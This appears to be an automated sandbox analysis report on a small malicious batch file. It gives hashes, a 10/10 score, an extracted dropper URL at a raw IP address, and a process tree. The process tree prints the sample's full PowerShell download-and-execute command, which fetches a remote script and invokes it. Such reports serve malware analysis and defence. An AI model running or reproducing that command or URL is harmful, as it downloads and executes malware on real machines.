Analysis
-
max time kernel
131s -
max time network
69s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
21-05-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
9e366799514a8ce5bccab4fc1af01e1f.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
9e366799514a8ce5bccab4fc1af01e1f.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
9e366799514a8ce5bccab4fc1af01e1f.bat
-
Size
213B
-
MD5
7563bdc5ef2e60e4af282d344dbde9ff
-
SHA1
87ec59517e50fe716e21c255f572e11e0b810619
-
SHA256
a15036f075ca149cc6635c5eb2cb1bab41c2462e3ad0d2b36513aa29099d1424
-
SHA512
178d9cca7b3a22c9fa0c5eaa052397bf36c815d64999ed5dc05d4e5922fcd28e7807a3ba8e3811e472838ec7de9746aa5cbd778ae48268e6af92a78f347c3f5f
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2176 1928 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2176 WerFault.exe Token: SeBackupPrivilege 2176 WerFault.exe Token: SeDebugPrivilege 2176 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9e366799514a8ce5bccab4fc1af01e1f.bat"1⤵PID:1732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f');Invoke-CRSRXA;Start-Sleep -s 10000"2⤵PID:1928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2176